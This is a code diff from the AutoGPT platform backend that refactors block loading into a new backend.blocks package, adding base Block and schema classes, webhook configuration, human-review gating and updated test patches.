|
|
||||||
# Get all available blocks
|
# Get all available blocks
|
||||||
all_blocks = get_blocks()
|
all_blocks = get_blocks()
|
||||||
@@ -249,7 +249,7 @@ class BlockHandler(ContentHandler):
|
|||||||
|
|
||||||
async def get_stats(self) -> dict[str, int]:
|
async def get_stats(self) -> dict[str, int]:
|
||||||
"""Get statistics about block embedding coverage."""
|
"""Get statistics about block embedding coverage."""
|
||||||
from backend.data.block import get_blocks
|
from backend.blocks import get_blocks
|
||||||
|
|
||||||
all_blocks = get_blocks()
|
all_blocks = get_blocks()
|
||||||
|
|
||||||
|
|||||||
@@ -93,7 +93,7 @@ async def test_block_handler_get_missing_items(mocker):
|
|||||||
mock_existing = []
|
mock_existing = []
|
||||||
|
|
||||||
with patch(
|
with patch(
|
||||||
"backend.data.block.get_blocks",
|
"backend.blocks.get_blocks",
|
||||||
return_value=mock_blocks,
|
return_value=mock_blocks,
|
||||||
):
|
):
|
||||||
with patch(
|
with patch(
|
||||||
@@ -135,7 +135,7 @@ async def test_block_handler_get_stats(mocker):
|
|||||||
mock_embedded = [{"count": 2}]
|
mock_embedded = [{"count": 2}]
|
||||||
|
|
||||||
with patch(
|
with patch(
|
||||||
"backend.data.block.get_blocks",
|
"backend.blocks.get_blocks",
|
||||||
return_value=mock_blocks,
|
return_value=mock_blocks,
|
||||||
):
|
):
|
||||||
with patch(
|
with patch(
|
||||||
@@ -327,7 +327,7 @@ async def test_block_handler_handles_missing_attributes():
|
|||||||
mock_blocks = {"block-minimal": mock_block_class}
|
mock_blocks = {"block-minimal": mock_block_class}
|
||||||
|
|
||||||
with patch(
|
with patch(
|
||||||
"backend.data.block.get_blocks",
|
"backend.blocks.get_blocks",
|
||||||
return_value=mock_blocks,
|
return_value=mock_blocks,
|
||||||
):
|
):
|
||||||
with patch(
|
with patch(
|
||||||
@@ -360,7 +360,7 @@ async def test_block_handler_skips_failed_blocks():
|
|||||||
mock_blocks = {"good-block": good_block, "bad-block": bad_block}
|
mock_blocks = {"good-block": good_block, "bad-block": bad_block}
|
||||||
|
|
||||||
with patch(
|
with patch(
|
||||||
"backend.data.block.get_blocks",
|
"backend.blocks.get_blocks",
|
||||||
return_value=mock_blocks,
|
return_value=mock_blocks,
|
||||||
):
|
):
|
||||||
with patch(
|
with patch(
|
||||||
|
|||||||
@@ -662,7 +662,7 @@ async def cleanup_orphaned_embeddings() -> dict[str, Any]:
|
|||||||
)
|
)
|
||||||
current_ids = {row["id"] for row in valid_agents}
|
current_ids = {row["id"] for row in valid_agents}
|
||||||
elif content_type == ContentType.BLOCK:
|
elif content_type == ContentType.BLOCK:
|
||||||
from backend.data.block import get_blocks
|
from backend.blocks import get_blocks
|
||||||
|
|
||||||
current_ids = set(get_blocks().keys())
|
current_ids = set(get_blocks().keys())
|
||||||
elif content_type == ContentType.DOCUMENTATION:
|
elif content_type == ContentType.DOCUMENTATION:
|
||||||
|
|||||||
@@ -7,15 +7,6 @@ from replicate.client import Client as ReplicateClient
 from replicate.exceptions import ReplicateError
 from replicate.helpers import FileOutput
 
-from backend.blocks.ideogram import (
-    AspectRatio,
-    ColorPalettePreset,
-    IdeogramModelBlock,
-    IdeogramModelName,
-    MagicPromptOption,
-    StyleType,
-    UpscaleOption,
-)
 from backend.data.graph import GraphBaseMeta
 from backend.data.model import CredentialsMetaInput, ProviderName
 from backend.integrations.credentials_store import ideogram_credentials
@@ -50,6 +41,16 @@ async def generate_agent_image_v2(graph: GraphBaseMeta | AgentGraph) -> io.Bytes
     if not ideogram_credentials.api_key:
         raise ValueError("Missing Ideogram API key")
 
+    from backend.blocks.ideogram import (
+        AspectRatio,
+        ColorPalettePreset,
+        IdeogramModelBlock,
+        IdeogramModelName,
+        MagicPromptOption,
+        StyleType,
+        UpscaleOption,
+    )
+
     name = graph.name
     description = f"{name} ({graph.description})" if graph.description else name
 
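The hunk above moves the Ideogram imports from module scope to inside `generate_agent_image_v2`, so `backend.blocks.ideogram` is only loaded when an image is actually generated. A minimal sketch of that deferred-import pattern, using a hypothetical `heavy_module` rather than code from this diff:

```python
# Sketch of the lazy-import pattern; `heavy_module.render` is hypothetical.
def make_image(prompt: str) -> bytes:
    # Importing here instead of at module scope avoids paying the import
    # cost (and any circular-import risk) until the function is called.
    from heavy_module import render

    return render(prompt)
```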
@@ -40,10 +40,11 @@ from backend.api.model import (
     UpdateTimezoneRequest,
     UploadFileResponse,
 )
+from backend.blocks import get_block, get_blocks
 from backend.data import execution as execution_db
 from backend.data import graph as graph_db
 from backend.data.auth import api_key as api_key_db
-from backend.data.block import BlockInput, CompletedBlockOutput, get_block, get_blocks
+from backend.data.block import BlockInput, CompletedBlockOutput
 from backend.data.credit import (
     AutoTopUpConfig,
     RefundRequest,
@@ -3,22 +3,19 @@ import logging
 import os
 import re
 from pathlib import Path
-from typing import TYPE_CHECKING, TypeVar
+from typing import Sequence, Type, TypeVar
 
+from backend.blocks._base import AnyBlockSchema, BlockType
 from backend.util.cache import cached
 
 logger = logging.getLogger(__name__)
 
-
-if TYPE_CHECKING:
-    from backend.data.block import Block
-
 T = TypeVar("T")
 
 
 @cached(ttl_seconds=3600)
-def load_all_blocks() -> dict[str, type["Block"]]:
-    from backend.data.block import Block
+def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
+    from backend.blocks._base import Block
     from backend.util.settings import Config
 
     # Check if example blocks should be loaded from settings
@@ -50,8 +47,8 @@ def load_all_blocks() -> dict[str, type["Block"]]:
             importlib.import_module(f".{module}", package=__name__)
 
     # Load all Block instances from the available modules
-    available_blocks: dict[str, type["Block"]] = {}
-    for block_cls in all_subclasses(Block):
+    available_blocks: dict[str, type["AnyBlockSchema"]] = {}
+    for block_cls in _all_subclasses(Block):
         class_name = block_cls.__name__
 
         if class_name.endswith("Base"):
@@ -64,7 +61,7 @@ def load_all_blocks() -> dict[str, type["Block"]]:
                 "please name the class with 'Base' at the end"
             )
 
-        block = block_cls.create()
+        block = block_cls()  # pyright: ignore[reportAbstractUsage]
 
         if not isinstance(block.id, str) or len(block.id) != 36:
             raise ValueError(
@@ -105,7 +102,7 @@ def load_all_blocks() -> dict[str, type["Block"]]:
         available_blocks[block.id] = block_cls
 
     # Filter out blocks with incomplete auth configs, e.g. missing OAuth server secrets
-    from backend.data.block import is_block_auth_configured
+    from ._utils import is_block_auth_configured
 
     filtered_blocks = {}
     for block_id, block_cls in available_blocks.items():
@@ -115,11 +112,48 @@ def load_all_blocks() -> dict[str, type["Block"]]:
     return filtered_blocks
 
 
-__all__ = ["load_all_blocks"]
-
-
-def all_subclasses(cls: type[T]) -> list[type[T]]:
+def _all_subclasses(cls: type[T]) -> list[type[T]]:
     subclasses = cls.__subclasses__()
     for subclass in subclasses:
-        subclasses += all_subclasses(subclass)
+        subclasses += _all_subclasses(subclass)
     return subclasses
+
+
+# ============== Block access helper functions ============== #
+
+
+def get_blocks() -> dict[str, Type["AnyBlockSchema"]]:
+    return load_all_blocks()
+
+
+# Note on the return type annotation: https://github.com/microsoft/pyright/issues/10281
+def get_block(block_id: str) -> "AnyBlockSchema | None":
+    cls = get_blocks().get(block_id)
+    return cls() if cls else None
+
+
+@cached(ttl_seconds=3600)
+def get_webhook_block_ids() -> Sequence[str]:
+    return [
+        id
+        for id, B in get_blocks().items()
+        if B().block_type in (BlockType.WEBHOOK, BlockType.WEBHOOK_MANUAL)
+    ]
+
+
+@cached(ttl_seconds=3600)
+def get_io_block_ids() -> Sequence[str]:
+    return [
+        id
+        for id, B in get_blocks().items()
+        if B().block_type in (BlockType.INPUT, BlockType.OUTPUT)
+    ]
+
+
+@cached(ttl_seconds=3600)
+def get_human_in_the_loop_block_ids() -> Sequence[str]:
+    return [
+        id
+        for id, B in get_blocks().items()
+        if B().block_type == BlockType.HUMAN_IN_THE_LOOP
+    ]
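With these helpers, callers resolve blocks through `backend.blocks` rather than `backend.data.block`, as the earlier hunks in this compare show. A short sketch of how the new accessors would be used; the UUID is a made-up example, not an ID from this diff:

```python
from backend.blocks import get_block, get_blocks

# Look up one block instance by ID; returns None for unknown IDs.
block = get_block("436c3d09-4dd7-4c30-93e4-e21ce8567d20")  # placeholder UUID
if block and not block.disabled:
    print(block.name)

# Enumerate all registered block classes (load_all_blocks() is cached for an hour).
for block_id, block_cls in get_blocks().items():
    print(block_id, block_cls.__name__)
```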
autogpt_platform/backend/backend/blocks/_base.py (new file, +739)
@@ -0,0 +1,739 @@
+import inspect
+import logging
+from abc import ABC, abstractmethod
+from enum import Enum
+from typing import (
+    TYPE_CHECKING,
+    Any,
+    Callable,
+    ClassVar,
+    Generic,
+    Optional,
+    Type,
+    TypeAlias,
+    TypeVar,
+    cast,
+    get_origin,
+)
+
+import jsonref
+import jsonschema
+from pydantic import BaseModel
+
+from backend.data.block import BlockInput, BlockOutput, BlockOutputEntry
+from backend.data.model import (
+    Credentials,
+    CredentialsFieldInfo,
+    CredentialsMetaInput,
+    SchemaField,
+    is_credentials_field_name,
+)
+from backend.integrations.providers import ProviderName
+from backend.util import json
+from backend.util.exceptions import (
+    BlockError,
+    BlockExecutionError,
+    BlockInputError,
+    BlockOutputError,
+    BlockUnknownError,
+)
+from backend.util.settings import Config
+
+logger = logging.getLogger(__name__)
+
+if TYPE_CHECKING:
+    from backend.data.execution import ExecutionContext
+    from backend.data.model import ContributorDetails, NodeExecutionStats
+
+    from ..data.graph import Link
+
+app_config = Config()
+
+
+BlockTestOutput = BlockOutputEntry | tuple[str, Callable[[Any], bool]]
+
+
+class BlockType(Enum):
+    STANDARD = "Standard"
+    INPUT = "Input"
+    OUTPUT = "Output"
+    NOTE = "Note"
+    WEBHOOK = "Webhook"
+    WEBHOOK_MANUAL = "Webhook (manual)"
+    AGENT = "Agent"
+    AI = "AI"
+    AYRSHARE = "Ayrshare"
+    HUMAN_IN_THE_LOOP = "Human In The Loop"
+
+
+class BlockCategory(Enum):
+    AI = "Block that leverages AI to perform a task."
+    SOCIAL = "Block that interacts with social media platforms."
+    TEXT = "Block that processes text data."
+    SEARCH = "Block that searches or extracts information from the internet."
+    BASIC = "Block that performs basic operations."
+    INPUT = "Block that interacts with input of the graph."
+    OUTPUT = "Block that interacts with output of the graph."
+    LOGIC = "Programming logic to control the flow of your agent"
+    COMMUNICATION = "Block that interacts with communication platforms."
+    DEVELOPER_TOOLS = "Developer tools such as GitHub blocks."
+    DATA = "Block that interacts with structured data."
+    HARDWARE = "Block that interacts with hardware."
+    AGENT = "Block that interacts with other agents."
+    CRM = "Block that interacts with CRM services."
+    SAFETY = (
+        "Block that provides AI safety mechanisms such as detecting harmful content"
+    )
+    PRODUCTIVITY = "Block that helps with productivity"
+    ISSUE_TRACKING = "Block that helps with issue tracking"
+    MULTIMEDIA = "Block that interacts with multimedia content"
+    MARKETING = "Block that helps with marketing"
+
+    def dict(self) -> dict[str, str]:
+        return {"category": self.name, "description": self.value}
+
+
+class BlockCostType(str, Enum):
+    RUN = "run"  # cost X credits per run
+    BYTE = "byte"  # cost X credits per byte
+    SECOND = "second"  # cost X credits per second
+
+
+class BlockCost(BaseModel):
+    cost_amount: int
+    cost_filter: BlockInput
+    cost_type: BlockCostType
+
+    def __init__(
+        self,
+        cost_amount: int,
+        cost_type: BlockCostType = BlockCostType.RUN,
+        cost_filter: Optional[BlockInput] = None,
+        **data: Any,
+    ) -> None:
+        super().__init__(
+            cost_amount=cost_amount,
+            cost_filter=cost_filter or {},
+            cost_type=cost_type,
+            **data,
+        )
+
+
+class BlockInfo(BaseModel):
+    id: str
+    name: str
+    inputSchema: dict[str, Any]
+    outputSchema: dict[str, Any]
+    costs: list[BlockCost]
+    description: str
+    categories: list[dict[str, str]]
+    contributors: list[dict[str, Any]]
+    staticOutput: bool
+    uiType: str
+
+
+class BlockSchema(BaseModel):
+    cached_jsonschema: ClassVar[dict[str, Any]]
+
+    @classmethod
+    def jsonschema(cls) -> dict[str, Any]:
+        if cls.cached_jsonschema:
+            return cls.cached_jsonschema
+
+        model = jsonref.replace_refs(cls.model_json_schema(), merge_props=True)
+
+        def ref_to_dict(obj):
+            if isinstance(obj, dict):
+                # OpenAPI <3.1 does not support sibling fields that has a $ref key
+                # So sometimes, the schema has an "allOf"/"anyOf"/"oneOf" with 1 item.
+                keys = {"allOf", "anyOf", "oneOf"}
+                one_key = next((k for k in keys if k in obj and len(obj[k]) == 1), None)
+                if one_key:
+                    obj.update(obj[one_key][0])
+
+                return {
+                    key: ref_to_dict(value)
+                    for key, value in obj.items()
+                    if not key.startswith("$") and key != one_key
+                }
+            elif isinstance(obj, list):
+                return [ref_to_dict(item) for item in obj]
+
+            return obj
+
+        cls.cached_jsonschema = cast(dict[str, Any], ref_to_dict(model))
+
+        return cls.cached_jsonschema
+
+    @classmethod
+    def validate_data(cls, data: BlockInput) -> str | None:
+        return json.validate_with_jsonschema(
+            schema=cls.jsonschema(),
+            data={k: v for k, v in data.items() if v is not None},
+        )
+
+    @classmethod
+    def get_mismatch_error(cls, data: BlockInput) -> str | None:
+        return cls.validate_data(data)
+
+    @classmethod
+    def get_field_schema(cls, field_name: str) -> dict[str, Any]:
+        model_schema = cls.jsonschema().get("properties", {})
+        if not model_schema:
+            raise ValueError(f"Invalid model schema {cls}")
+
+        property_schema = model_schema.get(field_name)
+        if not property_schema:
+            raise ValueError(f"Invalid property name {field_name}")
+
+        return property_schema
+
+    @classmethod
+    def validate_field(cls, field_name: str, data: BlockInput) -> str | None:
+        """
+        Validate the data against a specific property (one of the input/output name).
+        Returns the validation error message if the data does not match the schema.
+        """
+        try:
+            property_schema = cls.get_field_schema(field_name)
+            jsonschema.validate(json.to_dict(data), property_schema)
+            return None
+        except jsonschema.ValidationError as e:
+            return str(e)
+
+    @classmethod
+    def get_fields(cls) -> set[str]:
+        return set(cls.model_fields.keys())
+
+    @classmethod
+    def get_required_fields(cls) -> set[str]:
+        return {
+            field
+            for field, field_info in cls.model_fields.items()
+            if field_info.is_required()
+        }
+
+    @classmethod
+    def __pydantic_init_subclass__(cls, **kwargs):
+        """Validates the schema definition. Rules:
+        - Fields with annotation `CredentialsMetaInput` MUST be
+          named `credentials` or `*_credentials`
+        - Fields named `credentials` or `*_credentials` MUST be
+          of type `CredentialsMetaInput`
+        """
+        super().__pydantic_init_subclass__(**kwargs)
+
+        # Reset cached JSON schema to prevent inheriting it from parent class
+        cls.cached_jsonschema = {}
+
+        credentials_fields = cls.get_credentials_fields()
+
+        for field_name in cls.get_fields():
+            if is_credentials_field_name(field_name):
+                if field_name not in credentials_fields:
+                    raise TypeError(
+                        f"Credentials field '{field_name}' on {cls.__qualname__} "
+                        f"is not of type {CredentialsMetaInput.__name__}"
+                    )
+
+                CredentialsMetaInput.validate_credentials_field_schema(
+                    cls.get_field_schema(field_name), field_name
+                )
+
+            elif field_name in credentials_fields:
+                raise KeyError(
+                    f"Credentials field '{field_name}' on {cls.__qualname__} "
+                    "has invalid name: must be 'credentials' or *_credentials"
+                )
+
+    @classmethod
+    def get_credentials_fields(cls) -> dict[str, type[CredentialsMetaInput]]:
+        return {
+            field_name: info.annotation
+            for field_name, info in cls.model_fields.items()
+            if (
+                inspect.isclass(info.annotation)
+                and issubclass(
+                    get_origin(info.annotation) or info.annotation,
+                    CredentialsMetaInput,
+                )
+            )
+        }
+
+    @classmethod
+    def get_auto_credentials_fields(cls) -> dict[str, dict[str, Any]]:
+        """
+        Get fields that have auto_credentials metadata (e.g., GoogleDriveFileInput).
+
+        Returns a dict mapping kwarg_name -> {field_name, auto_credentials_config}
+
+        Raises:
+            ValueError: If multiple fields have the same kwarg_name, as this would
+                cause silent overwriting and only the last field would be processed.
+        """
+        result: dict[str, dict[str, Any]] = {}
+        schema = cls.jsonschema()
+        properties = schema.get("properties", {})
+
+        for field_name, field_schema in properties.items():
+            auto_creds = field_schema.get("auto_credentials")
+            if auto_creds:
+                kwarg_name = auto_creds.get("kwarg_name", "credentials")
+                if kwarg_name in result:
+                    raise ValueError(
+                        f"Duplicate auto_credentials kwarg_name '{kwarg_name}' "
+                        f"in fields '{result[kwarg_name]['field_name']}' and "
+                        f"'{field_name}' on {cls.__qualname__}"
+                    )
+                result[kwarg_name] = {
+                    "field_name": field_name,
+                    "config": auto_creds,
+                }
+        return result
+
+    @classmethod
+    def get_credentials_fields_info(cls) -> dict[str, CredentialsFieldInfo]:
+        result = {}
+
+        # Regular credentials fields
+        for field_name in cls.get_credentials_fields().keys():
+            result[field_name] = CredentialsFieldInfo.model_validate(
+                cls.get_field_schema(field_name), by_alias=True
+            )
+
+        # Auto-generated credentials fields (from GoogleDriveFileInput etc.)
+        for kwarg_name, info in cls.get_auto_credentials_fields().items():
+            config = info["config"]
+            # Build a schema-like dict that CredentialsFieldInfo can parse
+            auto_schema = {
+                "credentials_provider": [config.get("provider", "google")],
+                "credentials_types": [config.get("type", "oauth2")],
+                "credentials_scopes": config.get("scopes"),
+            }
+            result[kwarg_name] = CredentialsFieldInfo.model_validate(
+                auto_schema, by_alias=True
+            )
+
+        return result
+
+    @classmethod
+    def get_input_defaults(cls, data: BlockInput) -> BlockInput:
+        return data  # Return as is, by default.
+
+    @classmethod
+    def get_missing_links(cls, data: BlockInput, links: list["Link"]) -> set[str]:
+        input_fields_from_nodes = {link.sink_name for link in links}
+        return input_fields_from_nodes - set(data)
+
+    @classmethod
+    def get_missing_input(cls, data: BlockInput) -> set[str]:
+        return cls.get_required_fields() - set(data)
+
+
+class BlockSchemaInput(BlockSchema):
+    """
+    Base schema class for block inputs.
+    All block input schemas should extend this class for consistency.
+    """
+
+    pass
+
+
+class BlockSchemaOutput(BlockSchema):
+    """
+    Base schema class for block outputs that includes a standard error field.
+    All block output schemas should extend this class to ensure consistent error handling.
+    """
+
+    error: str = SchemaField(
+        description="Error message if the operation failed", default=""
+    )
+
+
+BlockSchemaInputType = TypeVar("BlockSchemaInputType", bound=BlockSchemaInput)
+BlockSchemaOutputType = TypeVar("BlockSchemaOutputType", bound=BlockSchemaOutput)
+
+
+class EmptyInputSchema(BlockSchemaInput):
+    pass
+
+
+class EmptyOutputSchema(BlockSchemaOutput):
+    pass
+
+
+# For backward compatibility - will be deprecated
+EmptySchema = EmptyOutputSchema
+
+
+# --8<-- [start:BlockWebhookConfig]
+class BlockManualWebhookConfig(BaseModel):
+    """
+    Configuration model for webhook-triggered blocks on which
+    the user has to manually set up the webhook at the provider.
+    """
+
+    provider: ProviderName
+    """The service provider that the webhook connects to"""
+
+    webhook_type: str
+    """
+    Identifier for the webhook type. E.g. GitHub has repo and organization level hooks.
+
+    Only for use in the corresponding `WebhooksManager`.
+    """
+
+    event_filter_input: str = ""
+    """
+    Name of the block's event filter input.
+    Leave empty if the corresponding webhook doesn't have distinct event/payload types.
+    """
+
+    event_format: str = "{event}"
+    """
+    Template string for the event(s) that a block instance subscribes to.
+    Applied individually to each event selected in the event filter input.
+
+    Example: `"pull_request.{event}"` -> `"pull_request.opened"`
+    """
+
+
+class BlockWebhookConfig(BlockManualWebhookConfig):
+    """
+    Configuration model for webhook-triggered blocks for which
+    the webhook can be automatically set up through the provider's API.
+    """
+
+    resource_format: str
+    """
+    Template string for the resource that a block instance subscribes to.
+    Fields will be filled from the block's inputs (except `payload`).
+
+    Example: `f"{repo}/pull_requests"` (note: not how it's actually implemented)
+
+    Only for use in the corresponding `WebhooksManager`.
+    """
+# --8<-- [end:BlockWebhookConfig]
+
+
+class Block(ABC, Generic[BlockSchemaInputType, BlockSchemaOutputType]):
+    def __init__(
+        self,
+        id: str = "",
+        description: str = "",
+        contributors: list["ContributorDetails"] = [],
+        categories: set[BlockCategory] | None = None,
+        input_schema: Type[BlockSchemaInputType] = EmptyInputSchema,
+        output_schema: Type[BlockSchemaOutputType] = EmptyOutputSchema,
+        test_input: BlockInput | list[BlockInput] | None = None,
+        test_output: BlockTestOutput | list[BlockTestOutput] | None = None,
+        test_mock: dict[str, Any] | None = None,
+        test_credentials: Optional[Credentials | dict[str, Credentials]] = None,
+        disabled: bool = False,
+        static_output: bool = False,
+        block_type: BlockType = BlockType.STANDARD,
+        webhook_config: Optional[BlockWebhookConfig | BlockManualWebhookConfig] = None,
+        is_sensitive_action: bool = False,
+    ):
+        """
+        Initialize the block with the given schema.
+
+        Args:
+            id: The unique identifier for the block, this value will be persisted in the
+                DB. So it should be a unique and constant across the application run.
+                Use the UUID format for the ID.
+            description: The description of the block, explaining what the block does.
+            contributors: The list of contributors who contributed to the block.
+            input_schema: The schema, defined as a Pydantic model, for the input data.
+            output_schema: The schema, defined as a Pydantic model, for the output data.
+            test_input: The list or single sample input data for the block, for testing.
+            test_output: The list or single expected output if the test_input is run.
+            test_mock: function names on the block implementation to mock on test run.
+            disabled: If the block is disabled, it will not be available for execution.
+            static_output: Whether the output links of the block are static by default.
+        """
+        from backend.data.model import NodeExecutionStats
+
+        self.id = id
+        self.input_schema = input_schema
+        self.output_schema = output_schema
+        self.test_input = test_input
+        self.test_output = test_output
+        self.test_mock = test_mock
+        self.test_credentials = test_credentials
+        self.description = description
+        self.categories = categories or set()
+        self.contributors = contributors or set()
+        self.disabled = disabled
+        self.static_output = static_output
+        self.block_type = block_type
+        self.webhook_config = webhook_config
+        self.is_sensitive_action = is_sensitive_action
+        self.execution_stats: "NodeExecutionStats" = NodeExecutionStats()
+
+        if self.webhook_config:
+            if isinstance(self.webhook_config, BlockWebhookConfig):
+                # Enforce presence of credentials field on auto-setup webhook blocks
+                if not (cred_fields := self.input_schema.get_credentials_fields()):
+                    raise TypeError(
+                        "credentials field is required on auto-setup webhook blocks"
+                    )
+                # Disallow multiple credentials inputs on webhook blocks
+                elif len(cred_fields) > 1:
+                    raise ValueError(
+                        "Multiple credentials inputs not supported on webhook blocks"
+                    )
+
+                self.block_type = BlockType.WEBHOOK
+            else:
+                self.block_type = BlockType.WEBHOOK_MANUAL
+
+            # Enforce shape of webhook event filter, if present
+            if self.webhook_config.event_filter_input:
+                event_filter_field = self.input_schema.model_fields[
+                    self.webhook_config.event_filter_input
+                ]
+                if not (
+                    isinstance(event_filter_field.annotation, type)
+                    and issubclass(event_filter_field.annotation, BaseModel)
+                    and all(
+                        field.annotation is bool
+                        for field in event_filter_field.annotation.model_fields.values()
+                    )
+                ):
+                    raise NotImplementedError(
+                        f"{self.name} has an invalid webhook event selector: "
+                        "field must be a BaseModel and all its fields must be boolean"
+                    )
+
+            # Enforce presence of 'payload' input
+            if "payload" not in self.input_schema.model_fields:
+                raise TypeError(
+                    f"{self.name} is webhook-triggered but has no 'payload' input"
+                )
+
+            # Disable webhook-triggered block if webhook functionality not available
+            if not app_config.platform_base_url:
+                self.disabled = True
+
+    @abstractmethod
+    async def run(self, input_data: BlockSchemaInputType, **kwargs) -> BlockOutput:
+        """
+        Run the block with the given input data.
+        Args:
+            input_data: The input data with the structure of input_schema.
+
+        Kwargs: Currently 14/02/2025 these include
+            graph_id: The ID of the graph.
+            node_id: The ID of the node.
+            graph_exec_id: The ID of the graph execution.
+            node_exec_id: The ID of the node execution.
+            user_id: The ID of the user.
+
+        Returns:
+            A Generator that yields (output_name, output_data).
+            output_name: One of the output name defined in Block's output_schema.
+            output_data: The data for the output_name, matching the defined schema.
+        """
+        # --- satisfy the type checker, never executed -------------
+        if False:  # noqa: SIM115
+            yield "name", "value"  # pyright: ignore[reportMissingYield]
+        raise NotImplementedError(f"{self.name} does not implement the run method.")
+
+    async def run_once(
+        self, input_data: BlockSchemaInputType, output: str, **kwargs
+    ) -> Any:
+        async for item in self.run(input_data, **kwargs):
+            name, data = item
+            if name == output:
+                return data
+        raise ValueError(f"{self.name} did not produce any output for {output}")
+
+    def merge_stats(self, stats: "NodeExecutionStats") -> "NodeExecutionStats":
+        self.execution_stats += stats
+        return self.execution_stats
+
+    @property
+    def name(self):
+        return self.__class__.__name__
+
+    def to_dict(self):
+        return {
+            "id": self.id,
+            "name": self.name,
+            "inputSchema": self.input_schema.jsonschema(),
+            "outputSchema": self.output_schema.jsonschema(),
+            "description": self.description,
+            "categories": [category.dict() for category in self.categories],
+            "contributors": [
+                contributor.model_dump() for contributor in self.contributors
+            ],
+            "staticOutput": self.static_output,
+            "uiType": self.block_type.value,
+        }
+
+    def get_info(self) -> BlockInfo:
+        from backend.data.credit import get_block_cost
+
+        return BlockInfo(
+            id=self.id,
+            name=self.name,
+            inputSchema=self.input_schema.jsonschema(),
+            outputSchema=self.output_schema.jsonschema(),
+            costs=get_block_cost(self),
+            description=self.description,
+            categories=[category.dict() for category in self.categories],
+            contributors=[
+                contributor.model_dump() for contributor in self.contributors
+            ],
+            staticOutput=self.static_output,
+            uiType=self.block_type.value,
+        )
+
+    async def execute(self, input_data: BlockInput, **kwargs) -> BlockOutput:
+        try:
+            async for output_name, output_data in self._execute(input_data, **kwargs):
+                yield output_name, output_data
+        except Exception as ex:
+            if isinstance(ex, BlockError):
+                raise ex
+            else:
+                raise (
+                    BlockExecutionError
+                    if isinstance(ex, ValueError)
+                    else BlockUnknownError
+                )(
+                    message=str(ex),
+                    block_name=self.name,
+                    block_id=self.id,
+                ) from ex
+
+    async def is_block_exec_need_review(
+        self,
+        input_data: BlockInput,
+        *,
+        user_id: str,
+        node_id: str,
+        node_exec_id: str,
+        graph_exec_id: str,
+        graph_id: str,
+        graph_version: int,
+        execution_context: "ExecutionContext",
+        **kwargs,
+    ) -> tuple[bool, BlockInput]:
+        """
+        Check if this block execution needs human review and handle the review process.
+
+        Returns:
+            Tuple of (should_pause, input_data_to_use)
+            - should_pause: True if execution should be paused for review
+            - input_data_to_use: The input data to use (may be modified by reviewer)
+        """
+        if not (
+            self.is_sensitive_action and execution_context.sensitive_action_safe_mode
+        ):
+            return False, input_data
+
+        from backend.blocks.helpers.review import HITLReviewHelper
+
+        # Handle the review request and get decision
+        decision = await HITLReviewHelper.handle_review_decision(
+            input_data=input_data,
+            user_id=user_id,
+            node_id=node_id,
+            node_exec_id=node_exec_id,
+            graph_exec_id=graph_exec_id,
+            graph_id=graph_id,
+            graph_version=graph_version,
+            block_name=self.name,
+            editable=True,
+        )
+
+        if decision is None:
+            # We're awaiting review - pause execution
+            return True, input_data
+
+        if not decision.should_proceed:
+            # Review was rejected, raise an error to stop execution
+            raise BlockExecutionError(
+                message=f"Block execution rejected by reviewer: {decision.message}",
+                block_name=self.name,
+                block_id=self.id,
+            )
+
+        # Review was approved - use the potentially modified data
+        # ReviewResult.data must be a dict for block inputs
+        reviewed_data = decision.review_result.data
+        if not isinstance(reviewed_data, dict):
+            raise BlockExecutionError(
+                message=f"Review data must be a dict for block input, got {type(reviewed_data).__name__}",
+                block_name=self.name,
+                block_id=self.id,
+            )
+        return False, reviewed_data
+
+    async def _execute(self, input_data: BlockInput, **kwargs) -> BlockOutput:
+        # Check for review requirement only if running within a graph execution context
+        # Direct block execution (e.g., from chat) skips the review process
+        has_graph_context = all(
+            key in kwargs
+            for key in (
+                "node_exec_id",
+                "graph_exec_id",
+                "graph_id",
+                "execution_context",
+            )
+        )
+        if has_graph_context:
+            should_pause, input_data = await self.is_block_exec_need_review(
+                input_data, **kwargs
+            )
+            if should_pause:
+                return
+
+        # Validate the input data (original or reviewer-modified) once
+        if error := self.input_schema.validate_data(input_data):
+            raise BlockInputError(
+                message=f"Unable to execute block with invalid input data: {error}",
+                block_name=self.name,
+                block_id=self.id,
+            )
+
+        # Use the validated input data
+        async for output_name, output_data in self.run(
+            self.input_schema(**{k: v for k, v in input_data.items() if v is not None}),
+            **kwargs,
+        ):
+            if output_name == "error":
+                raise BlockExecutionError(
+                    message=output_data, block_name=self.name, block_id=self.id
+                )
+            if self.block_type == BlockType.STANDARD and (
+                error := self.output_schema.validate_field(output_name, output_data)
+            ):
+                raise BlockOutputError(
+                    message=f"Block produced an invalid output data: {error}",
+                    block_name=self.name,
+                    block_id=self.id,
+                )
+            yield output_name, output_data
+
+    def is_triggered_by_event_type(
+        self, trigger_config: dict[str, Any], event_type: str
+    ) -> bool:
+        if not self.webhook_config:
+            raise TypeError("This method can't be used on non-trigger blocks")
+        if not self.webhook_config.event_filter_input:
+            return True
+        event_filter = trigger_config.get(self.webhook_config.event_filter_input)
+        if not event_filter:
+            raise ValueError("Event filter is not configured on trigger")
+        return event_type in [
+            self.webhook_config.event_format.format(event=k)
+            for k in event_filter
+            if event_filter[k] is True
+        ]
+
+
+# Type alias for any block with standard input/output schemas
+AnyBlockSchema: TypeAlias = Block[BlockSchemaInput, BlockSchemaOutput]
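A minimal sketch of a block built on the new base classes above; the class name, placeholder UUID, and fields are made up for illustration and are not part of this diff:

```python
from backend.blocks._base import (
    Block,
    BlockCategory,
    BlockOutput,
    BlockSchemaInput,
    BlockSchemaOutput,
)
from backend.data.model import SchemaField


class EchoBlock(Block):
    class Input(BlockSchemaInput):
        text: str = SchemaField(description="Text to echo back")

    class Output(BlockSchemaOutput):
        text: str = SchemaField(description="The same text")

    def __init__(self):
        super().__init__(
            id="00000000-0000-0000-0000-000000000000",  # placeholder 36-char UUID
            description="Echoes its input",
            categories={BlockCategory.BASIC},
            input_schema=EchoBlock.Input,
            output_schema=EchoBlock.Output,
        )

    async def run(self, input_data: Input, **kwargs) -> BlockOutput:
        # Yield (output_name, output_data) pairs, as execute() expects.
        yield "text", input_data.text
```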
autogpt_platform/backend/backend/blocks/_utils.py (new file, +122)
@@ -0,0 +1,122 @@
+import logging
+import os
+
+from backend.integrations.providers import ProviderName
+
+from ._base import AnyBlockSchema
+
+logger = logging.getLogger(__name__)
+
+
+def is_block_auth_configured(
+    block_cls: type[AnyBlockSchema],
+) -> bool:
+    """
+    Check if a block has a valid authentication method configured at runtime.
+
+    For example if a block is an OAuth-only block and there env vars are not set,
+    do not show it in the UI.
+    """
+    from backend.sdk.registry import AutoRegistry
+
+    # Create an instance to access input_schema
+    try:
+        block = block_cls()
